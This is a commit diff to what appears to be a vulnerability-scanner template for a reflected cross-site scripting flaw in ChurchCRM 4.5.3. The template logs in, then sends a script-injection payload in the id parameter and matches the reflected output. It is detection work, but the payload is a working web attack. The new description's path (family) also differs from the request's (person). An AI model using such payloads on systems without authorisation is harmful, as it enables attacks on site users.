updated path,info,matcher

http/cves/2023/CVE-2023-25346.yaml

@@ -1,11 +1,11 @@
 id: CVE-2023-25346
 
 info:
-  name: ChurchCMS - Reflected XSS
+  name: ChurchCRM 4.5.3 - Cross-Site Scripting
   author: Harsh
   severity: medium
   description: |
-    A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.
+    A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.
   reference:
     - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346
     - https://nvd.nist.gov/vuln/detail/CVE-2023-25346
@@ -16,19 +16,19 @@ info:
     cwe-id: CWE-79
   metadata:
     verified: true
-  tags: cve,cve2023,churchCMS,reflected,xss,auth
+  tags: cve,cve2023,churchcrm,xss,authenticated
 
 http:
   - raw:
       - |
-        POST /churchcrm/session/begin HTTP/1.1
+        POST /session/begin HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         User={{username}}&Password={{password}}
 
       - |
-        GET /churchcrm/v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true
@@ -36,6 +36,7 @@ http:
       - type: dsl
         dsl:
           - 'status_code_2 == 200'
+          - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "<script>alert(document.domain)</script>")'
           - 'contains(body_2, "ChurchCRM")'
         condition: and